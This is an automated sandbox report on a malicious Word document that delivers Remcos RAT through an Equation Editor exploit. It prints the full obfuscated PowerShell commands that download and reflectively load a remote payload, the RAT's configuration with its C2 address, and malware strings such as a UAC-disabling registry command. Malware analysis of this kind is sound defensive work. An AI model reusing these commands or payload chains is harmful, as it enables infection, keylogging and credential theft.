Windows Analysis Report
Scan Order and Specification 01-10- 2024.docx

Overview

General Information

Sample name: Scan Order and Specification 01-10- 2024.docx
Analysis ID: 1523191
MD5: fe8c8dbd1f4b4fa2023fe185c8ed9df0
SHA1: 5988ab649d7bb7f0d3886027f22effb94f9869cd
SHA256: 1acb6c95b780cceb7eab5a679c73e2c22b8e6550454164d2febb6b8b3a5094b5

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Contains an external reference to another file
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
Obfuscated command line found
Office drops RTF file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Searches for Windows Mail specific files
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 3348 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3800 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • wscript.exe (PID: 3872 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\niceworkwithpcitureupdateson.vBS" MD5: 979D74799EA6C8B8167869A68DF5204A)
        • powershell.exe (PID: 3916 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR1YgJyptRHIqJykubmFNZVszLDExLDJdLUpvaU4nJykoICgoJ3sxfXVybCA9IHswfWh0dCcrJ3BzJysnOi8nKycvcmF3LmcnKydpdCcrJ2h1YnVzZXJjb250JysnZW50JysnLmNvJysnbS9Ob0RlJysndGVjJysndE9uJysnL04nKydvRCcrJ2UnKyd0ZWN0JysnT24vcmVmcycrJy9oZWFkcy8nKydtYWluJysnL0RldGEnKydoTm8nKyd0aC1WLnR4dHswfTsgezEnKyd9JysnYicrJ2FzZTY0Q29udGVudCA9IChOZXcnKyctT2InKydqZWMnKyd0IFMnKyd5JysncycrJ3RlbS5OZXQnKycuV2ViJysnQ2xpZScrJ250KS4nKydEb3dubG8nKydhZFN0cicrJ2luZyh7JysnMX11JysncmwpOyB7MX1iJysnaW4nKydhcnlDb250ZW50ID0gWycrJ1N5c3QnKydlJysnbS4nKydDbycrJ252ZXInKyd0JysnXScrJzo6JysnRnJvbUJhJysnc2U2JysnNFMnKyd0JysncmknKyduZyh7JysnMScrJ31iYScrJ3NlJysnNjRDb250JysnZScrJ24nKyd0KTsgezF9YScrJ3NzZW1ibHkgPSBbJysnUmUnKydmbGVjdCcrJ2knKydvbicrJy4nKydBc3NlbScrJ2InKydseV0nKyc6OicrJ0xvJysnYWQoJysnezF9YicrJ2luYXInKyd5Q29udGUnKydudCk7IFtkbmwnKydpYi5JTy4nKydIb21lXScrJzo6JysnVkEnKydJKHsyfXR4JysndC5CR0YnKydSLycrJzAnKycxJysnNS84LjcuOCcrJzYxLjQwMS8vJysnOnB0dGh7Mn0sIHsnKycyJysnfScrJ2QnKydlc2EnKyd0aXZhZG97Mn0nKycsIHsyfWRlJysncycrJ2F0aXZhZCcrJ28nKyd7MicrJ30sIHsyJysnfWRlcycrJ2F0JysnaXZhJysnZG97JysnMn0nKycsIHsyfVInKydlJysnZ0FzbXsnKycyfSwgezInKyd9ezJ9LCcrJ3snKycyJysnfScrJ3syfSknKS1mIFtjSEFSXTM5LFtjSEFSXTM2LFtjSEFSXTM0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • powershell.exe (PID: 4004 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GV '*mDr*').naMe[3,11,2]-JoiN'')( (('{1}url = {0}htt'+'ps'+':/'+'/raw.g'+'it'+'hubusercont'+'ent'+'.co'+'m/NoDe'+'tec'+'tOn'+'/N'+'oD'+'e'+'tect'+'On/refs'+'/heads/'+'main'+'/Deta'+'hNo'+'th-V.txt{0}; {1'+'}'+'b'+'ase64Content = (New'+'-Ob'+'jec'+'t S'+'y'+'s'+'tem.Net'+'.Web'+'Clie'+'nt).'+'Downlo'+'adStr'+'ing({'+'1}u'+'rl); {1}b'+'in'+'aryContent = ['+'Syst'+'e'+'m.'+'Co'+'nver'+'t'+']'+'::'+'FromBa'+'se6'+'4S'+'t'+'ri'+'ng({'+'1'+'}ba'+'se'+'64Cont'+'e'+'n'+'t); {1}a'+'ssembly = ['+'Re'+'flect'+'i'+'on'+'.'+'Assem'+'b'+'ly]'+'::'+'Lo'+'ad('+'{1}b'+'inar'+'yConte'+'nt); [dnl'+'ib.IO.'+'Home]'+'::'+'VA'+'I({2}tx'+'t.BGF'+'R/'+'0'+'1'+'5/8.7.8'+'61.401//'+':ptth{2}, {'+'2'+'}'+'d'+'esa'+'tivado{2}'+', {2}de'+'s'+'ativad'+'o'+'{2'+'}, {2'+'}des'+'at'+'iva'+'do{'+'2}'+', {2}R'+'e'+'gAsm{'+'2}, {2'+'}{2},'+'{'+'2'+'}'+'{2})')-f [cHAR]39,[cHAR]36,[cHAR]34))" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
            • RegAsm.exe (PID: 2136 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 1972 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ichnvnuxjbsorvkwq" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 1060 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ichnvnuxjbsorvkwq" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 1884 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\twmgvffrxjktbjyahjdg" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 2556 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\vyrywypslrcydpuequqaufz" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 1688 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\irflzfvzpruafqgyqnkxgb" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 2200 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\algvnlhhqgudzwxguvhnulfpxhl" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 1120 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\srzilnhhbbbtiyigffpvarsgam" MD5: 8FE9545E9F72E460723F484C304314AD)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": "103.186.116.99:58934:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-IAW1Y3", "Keylog flag": "1", "Keylog path": "Temp", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source: C:\Users\user\AppData\Local\Temp\nor\logs.dat
Rule: JoeSecurity_Remcos
Description: Yara detected Remcos RAT
Author: Joe Security

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F971B2FE.doc
Rule: INDICATOR_RTF_MalVer_Objects
Description: Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents.
Author: ditekSHen
Strings:
  • 0x1ad7:$obj2: \objdata
  • 0x1abd:$obj3: \objupdate
  • 0x1a98:$obj6: \objlink

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\creambananacakegoodforladieswholovethebananasametimesheknowtheveryniceideadslawyasgetbackgreatthingswithme____securethingsareinthr[1].doc
Rule: INDICATOR_RTF_MalVer_Objects
Description: Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents.
Author: ditekSHen
Strings:
  • 0x1ad7:$obj2: \objdata
  • 0x1abd:$obj3: \objupdate
  • 0x1a98:$obj6: \objlink
Source: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Rule: JoeSecurity_Keylogger_Generic
Description: Yara detected Keylogger Generic
Author: Joe Security

Source: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Rule: JoeSecurity_Remcos
Description: Yara detected Remcos RAT
Author: Joe Security

Source: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Rule: JoeSecurity_UACBypassusingCMSTP
Description: Yara detected UAC Bypass using CMSTP
Author: Joe Security

Source: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Rule: Windows_Trojan_Remcos_b296e965
Description: unknown
Author: unknown
Strings:
  • 0x6c4b8:$a1: Remcos restarted by watchdog!
  • 0x6ca30:$a3: %02i:%02i:%02i:%03i

Source: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Rule: REMCOS_RAT_variants
Description: unknown
Author: unknown
Strings:
  • 0x6650c:$str_a1: C:\Windows\System32\cmd.exe
  • 0x66488:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x66488:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x66988:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x671b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x6657c:$str_b2: Executing file:
  • 0x675fc:$str_b3: GetDirectListeningPort
  • 0x66fa8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x67128:$str_b7: \update.vbs
  • 0x665a4:$str_b9: Downloaded file:
  • 0x66590:$str_b10: Downloading file:
  • 0x66634:$str_b12: Failed to upload file:
  • 0x675c4:$str_b13: StartForward
  • 0x675e4:$str_b14: StopForward
  • 0x67080:$str_b15: fso.DeleteFile "
  • 0x67014:$str_b16: On Error Resume Next
  • 0x670b0:$str_b17: fso.DeleteFolder "
  • 0x66624:$str_b18: Uploaded file:
  • 0x665e4:$str_b19: Unable to delete:
  • 0x67048:$str_b20: while fso.FileExists("
  • 0x66ac1:$str_c0: [Firefox StoredLogins not found]
Source: 12.2.powershell.exe.3ab0b60.1.unpack
Rule: JoeSecurity_Keylogger_Generic
Description: Yara detected Keylogger Generic
Author: Joe Security

Source: 12.2.powershell.exe.3ab0b60.1.unpack
Rule: JoeSecurity_Remcos
Description: Yara detected Remcos RAT
Author: Joe Security

Source: 12.2.powershell.exe.3ab0b60.1.unpack
Rule: JoeSecurity_UACBypassusingCMSTP
Description: Yara detected UAC Bypass using CMSTP
Author: Joe Security

Source: 12.2.powershell.exe.3ab0b60.1.unpack
Rule: Windows_Trojan_Remcos_b296e965
Description: unknown
Author: unknown
Strings:
  • 0x690b8:$a1: Remcos restarted by watchdog!
  • 0x69630:$a3: %02i:%02i:%02i:%03i

Source: 12.2.powershell.exe.3ab0b60.1.unpack
Rule: REMCOS_RAT_variants
Description: unknown
Author: unknown
Strings:
  • 0x6310c:$str_a1: C:\Windows\System32\cmd.exe
  • 0x63088:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x63088:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x63588:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x63db8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x6317c:$str_b2: Executing file:
  • 0x641fc:$str_b3: GetDirectListeningPort
  • 0x63ba8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x63d28:$str_b7: \update.vbs
  • 0x631a4:$str_b9: Downloaded file:
  • 0x63190:$str_b10: Downloading file:
  • 0x63234:$str_b12: Failed to upload file:
  • 0x641c4:$str_b13: StartForward
  • 0x641e4:$str_b14: StopForward
  • 0x63c80:$str_b15: fso.DeleteFile "
  • 0x63c14:$str_b16: On Error Resume Next
  • 0x63cb0:$str_b17: fso.DeleteFolder "
  • 0x63224:$str_b18: Uploaded file:
  • 0x631e4:$str_b19: Unable to delete:
  • 0x63c48:$str_b20: while fso.FileExists("
  • 0x636c1:$str_c0: [Firefox StoredLogins not found]

Exploits

Source: Network Connection; Author: Joe Security; Data: DestinationIp: 104.168.7.8, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3800, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49169
Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3800, TargetFilename: C:\Users\user\AppData\Roaming\niceworkwithpcitureupdateson.vBS

System Summary

                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName:
Source: Network Connection; Author: Max Altgelt (Nextron Systems); Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49169, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3800, Protocol: tcp, SourceIp: 104.168.7.8, SourceIsIpv6: false, SourcePort: 80
                Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GV '*mDr*').naMe[3,11,2]-JoiN'')( (('{1}url = {0}htt'+'ps'+':/'+'/raw.g'+'it'+'hubusercont'+'ent'+'.co'+'m/NoDe'+'tec'+'tOn'+'/N'+'oD'+'e'+'tect'+'On/refs'+'/heads/'+'main'+'/Deta'+'hNo'+'th-V.txt{0}; {1'+'}'+'b'+'ase64Content = (New'+'-Ob'+'jec'+'t S'+'y'+'s'+'tem.Net'+'.Web'+'Clie'+'nt).'+'Downlo'+'adStr'+'ing({'+'1}u'+'rl); {1}b'+'in'+'aryContent = ['+'Syst'+'e'+'m.'+'Co'+'nver'+'t'+']'+'::'+'FromBa'+'se6'+'4S'+'t'+'ri'+'ng({'+'1'+'}ba'+'se'+'64Cont'+'e'+'n'+'t); {1}a'+'ssembly = ['+'Re'+'flect'+'i'+'on'+'.'+'Assem'+'b'+'ly]'+'::'+'Lo'+'ad('+'{1}b'+'inar'+'yConte'+'nt); [dnl'+'ib.IO.'+'Home]'+'::'+'VA'+'I({2}tx'+'t.BGF'+'R/'+'0'+'1'+'5/8.7.8'+'61.401//'+':ptth{2}, {'+'2'+'}'+'d'+'esa'+'tivado{2}'+', {2}de'+'s'+'ativad'+'o'+'{2'+'}, {2'+'}des'+'at'+'iva'+'do{'+'2}'+', {2}R'+'e'+'gAsm{'+'2}, {2'+'}{2},'+'{'+'2'+'}'+'{2})')-f [cHAR]39,[cHAR]36,[cHAR]34))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GV '*mDr*').naMe[3,11,2]-JoiN'')( (('{1}url = {0}htt'+'ps'+':/'+'/raw.g'+'it'+'hubusercont'+'ent'+'.co'+'m/NoDe'+'tec'+'tOn'+'/N'+'oD'+'e'+'tect'+'On/refs'+'/heads/'+'main'+'/Deta'+'hNo'+'th-V.txt{0}; {1'+'}'+'b'+'ase64Content = (New'+'-Ob'+'jec'+'t S'+'y'+'s'+'tem.Net'+'.Web'+'Clie'+'nt).'+'Downlo'+'adStr'+'ing({'+'1}u'+'rl); {1}b'+'in'+'aryContent = ['+'Syst'+'e'+'m.'+'Co'+'nver'+'t'+']'+'::'+'FromBa'+'se6'+'4S'+'t'+'ri'+'ng({'+'1'+'}ba'+'se'+'64Cont'+'e'+'n'+'t); {1}a'+'ssembly = ['+'Re'+'flect'+'i'+'on'+'.'+'Assem'+'b'+'ly]'+'::'+'Lo'+'ad('+'{1}b'+'inar'+'yConte'+'nt); [dnl'+'ib.IO.'+'Home]'+'::'+'VA'+'I({2}tx'+'t.BGF'+'R/'+'0'+'1'+'5/8.7.8'+'61.401//'+':ptth{2}, {'+'2'+'}'+'d'+'esa'+'tivado{2}'+', 
{2}de'+'s'+'ativad'+'o'+'{2'+'}, {2'+'}des'+'at'+'iva'+'do{'+'2}'+', {2}R'+'e'+'gAsm{'+'2}, {2'+'}{2},'+'{'+'2'+'}'+'{2})')-f [cHAR]39,[cHAR]36,[cHAR]34))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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
                Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GV '*mDr*').naMe[3,11,2]-JoiN'')( (('{1}url = {0}htt'+'ps'+':/'+'/raw.g'+'it'+'hubusercont'+'ent'+'.co'+'m/NoDe'+'tec'+'tOn'+'/N'+'oD'+'e'+'tect'+'On/refs'+'/heads/'+'main'+'/Deta'+'hNo'+'th-V.txt{0}; {1'+'}'+'b'+'ase64Content = (New'+'-Ob'+'jec'+'t S'+'y'+'s'+'tem.Net'+'.Web'+'Clie'+'nt).'+'Downlo'+'adStr'+'ing({'+'1}u'+'rl); {1}b'+'in'+'aryContent = ['+'Syst'+'e'+'m.'+'Co'+'nver'+'t'+']'+'::'+'FromBa'+'se6'+'4S'+'t'+'ri'+'ng({'+'1'+'}ba'+'se'+'64Cont'+'e'+'n'+'t); {1}a'+'ssembly = ['+'Re'+'flect'+'i'+'on'+'.'+'Assem'+'b'+'ly]'+'::'+'Lo'+'ad('+'{1}b'+'inar'+'yConte'+'nt); [dnl'+'ib.IO.'+'Home]'+'::'+'VA'+'I({2}tx'+'t.BGF'+'R/'+'0'+'1'+'5/8.7.8'+'61.401//'+':ptth{2}, {'+'2'+'}'+'d'+'esa'+'tivado{2}'+', {2}de'+'s'+'ativad'+'o'+'{2'+'}, {2'+'}des'+'at'+'iva'+'do{'+'2}'+', {2}R'+'e'+'gAsm{'+'2}, {2'+'}{2},'+'{'+'2'+'}'+'{2})')-f [cHAR]39,[cHAR]36,[cHAR]34))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GV '*mDr*').naMe[3,11,2]-JoiN'')( (('{1}url = {0}htt'+'ps'+':/'+'/raw.g'+'it'+'hubusercont'+'ent'+'.co'+'m/NoDe'+'tec'+'tOn'+'/N'+'oD'+'e'+'tect'+'On/refs'+'/heads/'+'main'+'/Deta'+'hNo'+'th-V.txt{0}; {1'+'}'+'b'+'ase64Content = (New'+'-Ob'+'jec'+'t S'+'y'+'s'+'tem.Net'+'.Web'+'Clie'+'nt).'+'Downlo'+'adStr'+'ing({'+'1}u'+'rl); {1}b'+'in'+'aryContent = ['+'Syst'+'e'+'m.'+'Co'+'nver'+'t'+']'+'::'+'FromBa'+'se6'+'4S'+'t'+'ri'+'ng({'+'1'+'}ba'+'se'+'64Cont'+'e'+'n'+'t); {1}a'+'ssembly = ['+'Re'+'flect'+'i'+'on'+'.'+'Assem'+'b'+'ly]'+'::'+'Lo'+'ad('+'{1}b'+'inar'+'yConte'+'nt); [dnl'+'ib.IO.'+'Home]'+'::'+'VA'+'I({2}tx'+'t.BGF'+'R/'+'0'+'1'+'5/8.7.8'+'61.401//'+':ptth{2}, {'+'2'+'}'+'d'+'esa'+'tivado{2}'+', 
{2}de'+'s'+'ativad'+'o'+'{2'+'}, {2'+'}des'+'at'+'iva'+'do{'+'2}'+', {2}R'+'e'+'gAsm{'+'2}, {2'+'}{2},'+'{'+'2'+'}'+'{2})')-f [cHAR]39,[cHAR]36,[cHAR]34))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR1YgJyptRHIqJykubmFNZVszLDExLDJdLUpvaU4nJykoICgoJ3sxfXVybCA9IHswfWh0dCcrJ3BzJysnOi8nKycvcmF3LmcnKydpdCcrJ2h1YnVzZXJjb250JysnZW50JysnLmNvJysnbS9Ob0RlJysndGVjJysndE9uJysnL04nKydvRCcrJ2UnKyd0ZWN0JysnT24vcmVmcycrJy9oZWFkcy8nKydtYWluJysnL0RldGEnKydoTm8nKyd0aC1WLnR4dHswfTsgezEnKyd9JysnYicrJ2FzZTY0Q29udGVudCA9IChOZXcnKyctT2InKydqZWMnKyd0IFMnKyd5JysncycrJ3RlbS5OZXQnKycuV2ViJysnQ2xpZScrJ250KS4nKydEb3dubG8nKydhZFN0cicrJ2luZyh7JysnMX11JysncmwpOyB7MX1iJysnaW4nKydhcnlDb250ZW50ID0gWycrJ1N5c3QnKydlJysnbS4nKydDbycrJ252ZXInKyd0JysnXScrJzo6JysnRnJvbUJhJysnc2U2JysnNFMnKyd0JysncmknKyduZyh7JysnMScrJ31iYScrJ3NlJysnNjRDb250Jys
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName:
Source: Process started; Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\niceworkwithpcitureupdateson.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\niceworkwithpcitureupdateson.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3800, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" 